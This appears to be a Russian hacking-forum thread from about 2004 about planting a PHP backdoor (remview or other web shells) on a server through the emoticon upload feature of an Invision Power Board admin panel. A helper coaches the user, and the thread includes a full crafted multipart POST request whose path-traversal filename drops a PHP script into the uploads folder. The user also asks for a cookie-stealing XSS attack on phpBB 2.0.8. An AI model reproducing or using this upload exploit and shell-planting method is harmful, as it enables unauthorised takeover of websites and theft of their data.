Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power

Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power Board ???
На сайте www.antichat.ru/txt/IPB/index2.php - Algol рассказывает как можно это сделать через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа. Однако иногда это не выходит  !!! И вот я хочу спросить не знает ли еще кто-нибудь о другом способе заливки бэкдора !!!
P.S заранее спасибо !!!

 

Что значит "не выходит"??
Опиши нормально проблему.

 

Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!!

 

Кстати Algol не подскажешь еще пример межсайтового скриптинга для похищения кукисов с phpbb 2.0.8

 

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 01 2004,17:25)</td></tr><tr><td id="QUOTE">Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!![/QUOTE]<span id='postcolor'>
Кто пишет?
В какой ситуации пишет ??
Смайлики загружаются хоть куда нибудь?
Автаоры в upload загружаются ?
(И кстати в статье фокус со смйлами описан для примера, а вообще-то можно попробовать и через что-то другое заливать)

PS
Насчет phpBB - пока за него не брались, поэтому ничего сказать не могу.. Если найдешь что нить - черкани ...

 

Объясняю подробно и понятно !!! Захожу я в админку выбираю меню загрузки смайликов,пытаюсь загрузить remview и другие шеллы,нажимаю кнопку загрузить и через несколько секунд появляется страница с надписью неудачная загрузка !!! Причём не загружаются даже смайлики,которые в принципе должны закружаться  

 

Ну правильно. В директорию смайлов запись закрыта. Но в upload то должно загружаться

 

По пробовал залить в upload,для этого воспользовался твоей статьей захват сайтов и примером модифицированного запроса:
POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.p....ode=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;adsess&quot;

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;code&quot;

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;act&quot;

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;MAX_FILE_SIZE&quot;

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name=&quot;FILE_UPLOAD&quot;; filename=&quot;../../uploads/myFile.php&quot;
Content-Type: application/octet-stream

&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--

Ну естественно название сайта и хэш сменил, но после отправки если нажать кнопку show body in browser то открывается окно и просят ввести пароль для входа в админку !!! Я не знаю почему так получается ведь хэш то правильный у меня указан !!! И еще вот эта строчка

&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???

 

Помимо адреса и хеша, нужно еще заменить номер сессии adsess=7456d367b18da87d161f59424a4e96f7

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">&lt;% echo(&quot;Hello from injected PHP script&quot %&gt;
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???[/QUOTE]<span id='postcolor'>
Вообще-то это внедряемый пхп-скрипт  

 

Всё изменил как надо,только теперь в твоей проге  сразу открывается окно с надписью неудачная загрузка !!!
И даже не предлагают ничего загрузить    вот в этом теперь и проблема !!!

 

Еще раз спрашиваю: аватары в форуме загрузить можно ???
Если можно, значит uploads открыта на запись, а значит загрузка должна работать. Если не работает, значит ты где-то что-то неправильно делаешь ...

 

Я просто немного недопонимаю как ты заливаешь бэкдор в другую папку !!!
Насколько я понял ты модифицируешь запрос с помощью inetcrack, затем нажимаешь show body in browser и у тебя открывается страница загрузки,там ты нажимаешь обзор выбираешь файло с твоего харда или еще чего нибудь и нажимаешь загрузить !!! Только вот не понятно как ты узнаешь потом что бэкдор залит, или там после заливки что-то пишется дальше ?!!

 

Ты видимо действительно ничего не понял .....
Читай основы HTTP &nbsp;http://antichat.ru/crackchat/HTTP/http.html